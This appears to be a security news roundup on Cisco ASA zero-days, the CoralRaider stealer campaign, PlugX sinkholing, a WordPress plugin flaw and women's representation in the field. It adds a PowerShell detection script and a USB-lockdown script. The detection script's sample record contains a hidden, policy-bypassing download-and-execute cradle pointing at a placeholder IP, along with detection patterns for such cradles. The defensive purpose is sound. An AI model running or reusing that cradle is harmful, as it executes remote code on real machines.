TLDR:
- Cisco ASA gateways have two zero-day vulnerabilities that are being exploited by a government-backed threat actor.
- A content delivery network is being used to deliver information-stealing malware to organizations around the world.
- A WordPress plugin vulnerability is being actively exploited by threat actors.
Network administrators with Cisco Systems’ ASA security appliances on their networks are urged to install the latest security patches because two zero-day vulnerabilities are being exploited. Cisco says the attacker is likely a government-backed threat actor; compromised devices were first seen in January. The attack deposits a backdoor with various capabilities on ASA gateway devices. Separately, a threat actor is hiding behind a CDN to deliver information-stealing malware to organizations around the world. In the WordPress ecosystem, a vulnerable version of a plugin is being actively exploited. And despite efforts to increase women’s participation in cybersecurity, the industry still sees a gender gap in both representation and salary.
Full Article:
Network administrators with Cisco Systems’ ASA security appliances on their networks are urged to install the latest security patches. This comes after the discovery of two zero-day vulnerabilities that are being exploited. Cisco says the attacker is likely a government-backed threat actor. Although compromised devices were first seen in January, attack activity may have started as early as last November. Cisco cannot yet say how the devices were initially compromised. The attack deposits a backdoor on ASA gateway devices, which combine firewall, antivirus, intrusion prevention and virtual private network functions in a single appliance. Cisco also says network telemetry and information from intelligence partners indicate the actor is interested in, and potentially attacking, Microsoft Exchange servers and network devices from other vendors.
A threat actor is hiding behind the cache of a content delivery network to deliver information-stealing malware to organizations around the world. That’s according to researchers at Cisco’s Talos threat intelligence service. Firms hit so far are in the U.S., the U.K., Germany, Norway, Poland, Japan and elsewhere. The researchers suspect the threat actor is a Vietnam-based group they call CoralRaider. Employees are believed to be tricked by phishing emails into downloading and opening a malicious ZIP file, which triggers the infection. Inside the ZIP file is a Windows shortcut (.lnk) file that starts a PowerShell command. That command eventually downloads malware that vacuums up credentials, cookies, credit card numbers and anything else it can find.
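The ZIP-to-shortcut-to-PowerShell chain described above leaves a recognisable footprint in process-creation telemetry: PowerShell started by Explorer (a double-clicked file), often with a working directory inside the folder Explorer uses when a file is opened straight out of a ZIP, and a command line carrying a download cradle or evasion switches. The script below is an added example written for this page, not code from Talos or from the original article. It runs a triage filter over a few constructed records shaped like Sysmon Event ID 1 fields (Image, ParentImage, CurrentDirectory, CommandLine); the sample rows, the TEST-NET address in them and the scoring rule are all assumptions for illustration.

```powershell
# Added example (not from the original article or from Talos): triage filter for the
# ZIP -> .lnk -> PowerShell -> download-cradle chain, run over constructed sample records.
# Field names follow Sysmon Event ID 1; in production feed it from
#   Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-Sysmon/Operational'; Id=1 }
# after mapping the event properties onto these four fields.

# Constructed sample data (not real telemetry). Record 1 mimics the infection chain;
# records 2 and 3 are benign PowerShell launches that must not be flagged.
$SampleRecords = @(
    [pscustomobject]@{ Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage='C:\Windows\explorer.exe'; CurrentDirectory='C:\Users\alice\AppData\Local\Temp\Temp1_invoice.zip\'; CommandLine='powershell.exe -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(''http://198.51.100.7/update.txt'')"' }
    [pscustomobject]@{ Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage='C:\Windows\System32\cmd.exe';  CurrentDirectory='C:\scripts\';             CommandLine='powershell.exe -File C:\scripts\backup.ps1' }
    [pscustomobject]@{ Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage='C:\Windows\explorer.exe';     CurrentDirectory='C:\Users\bob\Documents\';  CommandLine='powershell.exe -File "C:\Users\bob\Documents\report.ps1"' }
)

function Test-LnkPowerShellChain {
    # Returns an object with Suspicious = $true when a PowerShell launch carries at least
    # two independent indicators of the chain. ($Record is used instead of $Event, which
    # is a PowerShell automatic variable.)
    param([Parameter(Mandatory)]$Record)

    $reasons = [System.Collections.Generic.List[string]]::new()
    $isPowerShell = $Record.Image -match '\\(powershell|pwsh)\.exe$'

    # Indicator 1: PowerShell is a child of Explorer, i.e. the user double-clicked something
    # (a .lnk that targets powershell.exe shows up exactly like this).
    if ($isPowerShell -and $Record.ParentImage -match '\\explorer\.exe$') {
        $reasons.Add('powershell.exe launched by explorer.exe (double-clicked file such as a .lnk)')
    }
    # Indicator 2: working directory is the Temp1_<archive>.zip folder Explorer creates when a
    # file is opened directly from inside a ZIP rather than extracted first.
    if ($Record.CurrentDirectory -match '\\Temp1_[^\\]+\.zip\\?$') {
        $reasons.Add('working directory is an Explorer-extracted ZIP folder (Temp1_*.zip)')
    }
    # Indicator 3: a download cradle or encoded command in the command line.
    if ($Record.CommandLine -match 'DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|FromBase64String|-e(nc|ncodedcommand)?\s') {
        $reasons.Add('download cradle or encoded command on the command line')
    }
    # Indicator 4: evasion switches (hidden window, no profile, execution-policy bypass).
    if ($Record.CommandLine -match '-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-executionpolicy\s+bypass') {
        $reasons.Add('evasion switches (-w hidden / -nop / -ep bypass)')
    }

    [pscustomobject]@{
        Suspicious  = ($isPowerShell -and $reasons.Count -ge 2)
        Reasons     = $reasons
        CommandLine = $Record.CommandLine
    }
}

# Usage: only record 1 is reported; the admin script and the user's own .ps1 are not.
$SampleRecords | ForEach-Object { Test-LnkPowerShellChain -Record $_ } | Where-Object Suspicious | Format-List
```

The two-indicator threshold is deliberate: PowerShell launched from Explorer on its own is common (users opening their own scripts), and a Temp1_*.zip working directory on its own is just someone reading a document inside an archive. Tune the indicator list to your environment and add a seventh-day review of what the filter suppresses before trusting it as an alert source.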
Last September researchers at Sekoia took over a command and control server distributing the worm version of the PlugX backdoor. The goal of the takeover was to sinkhole the distribution botnet; in other words, automated requests for the malware would disappear as if into a sinkhole. However, Sekoia said this week there are still tens of thousands of internet-connected devices trying to connect to the server every day. In other words, this worm can’t be completely stopped because it is still replicating itself. Because Sekoia controls the distribution server it thinks it could issue a command to infected computers to delete PlugX, but there are legal implications. Deleting it from the infected flash drives that spread it may be harder, especially if they aren’t plugged into a computer. Because infected USB keys and storage devices are still used to spread many types of malware, Sekoia urges IT administrators to block execution of any file from a removable device, or to configure Windows to deny all access to removable storage for every employee.
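Both of Sekoia's recommendations map onto standard Windows Group Policy settings under Computer Configuration > Administrative Templates > System > Removable Storage Access: "Removable Disks: Deny execute access" for the weaker option and "All Removable Storage classes: Deny all access" for the stronger one. The script below is an added example for this page, not code from Sekoia or from the original article. It writes the registry policy values those two settings correspond to on a standalone host and reads them back for verification; the function names are my own, and the script assumes an elevated session. In a domain you would put the same settings in a GPO rather than run this per host.

```powershell
# Added example (not from the original article or from Sekoia): apply and verify the
# Windows "Removable Storage Access" policies that Sekoia's advice corresponds to.
# Registry values written here are the ones the Local Group Policy Editor writes for
#   Computer Configuration > Administrative Templates > System > Removable Storage Access
#     "Removable Disks: Deny execute access"           -> Deny_Execute (under the removable-disk class key)
#     "All Removable Storage classes: Deny all access" -> Deny_All     (under the parent key)
# Run in an elevated PowerShell session. Function names are this example's own.

$PolicyRoot       = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\RemovableStorageDevices'
$RemovableDiskKey = Join-Path $PolicyRoot '{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'   # removable-disk device class

function Set-PolicyDword {
    # Create the policy key if needed and write a DWORD value (overwriting any existing one).
    param([string]$Path, [string]$Name, [int]$Value)
    if (-not (Test-Path -Path $Path)) {
        New-Item -Path $Path -Force | Out-Null
    }
    New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType DWord -Force | Out-Null
}

function Set-RemovableStorageLockdown {
    param(
        # Default: deny execute only, so staff can still copy files to and from USB sticks.
        # -DenyAll is Sekoia's stronger option: removable storage cannot be read, written or executed.
        [switch]$DenyAll
    )
    if ($DenyAll) {
        Set-PolicyDword -Path $PolicyRoot -Name 'Deny_All' -Value 1
    } else {
        Set-PolicyDword -Path $RemovableDiskKey -Name 'Deny_Execute' -Value 1
    }
}

function Get-RemovableStorageLockdown {
    # Read the values back so the change can be verified here and audited on other hosts.
    $denyAll     = (Get-ItemProperty -Path $PolicyRoot       -Name 'Deny_All'     -ErrorAction SilentlyContinue).Deny_All
    $denyExecute = (Get-ItemProperty -Path $RemovableDiskKey -Name 'Deny_Execute' -ErrorAction SilentlyContinue).Deny_Execute
    [pscustomobject]@{
        DenyAllRemovableStorage  = ($denyAll -eq 1)
        DenyExecuteRemovableDisk = ($denyExecute -eq 1)
    }
}

# Usage: block execution from removable disks, then confirm the policy values are in place.
Set-RemovableStorageLockdown
Get-RemovableStorageLockdown | Format-List
```

The policy is enforced by the storage class drivers, so reboot (or at least unplug and reinsert the device) before testing, and test with something harmless such as a copy of calc.exe on a USB stick. Note that deny-execute does not stop a user from copying an executable off the stick and running it from the local disk; only the deny-all setting (or application control such as AppLocker) closes that path.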
Threat actors are actively exploiting unpatched WordPress installations that use a vulnerable version of the WP Automatic plugin. That’s according to researchers at WPScan. The plugin automates the posting of content to a website. The hole in the plugin, a SQL injection flaw, was disclosed weeks ago and a patch is available. Slow patchers are paying the price by seeing their WordPress sites taken over.
Despite efforts by educators and job recruiters to boost the participation of women in cybersecurity, the number of women working in the sector hasn’t budged much. That’s one of the findings of a close look at data collected in the annual global cybersecurity workforce study by ISC2. The full report was released in February, but the analysis of the survey responses from women was released this week. The proportion of women in the industry is estimated to be between 20 and 25 per cent, with higher representation among workers under the age of 44. On average, respondents said 23 per cent of their security teams are made up of women. However, 11 per cent of all survey participants said there were no women on their security teams. Twenty-one per cent of men surveyed couldn’t estimate how many women were on their security teams; by comparison, 13 per cent of women respondents said they couldn’t guess how many teammates were women. The salary gap between men and women still exists: on average it is about $5,400. The report says there are several ways employers can help increase women’s participation in cybersecurity, including setting hiring, recruitment and advancement metrics in the organization, and making pay equity a priority.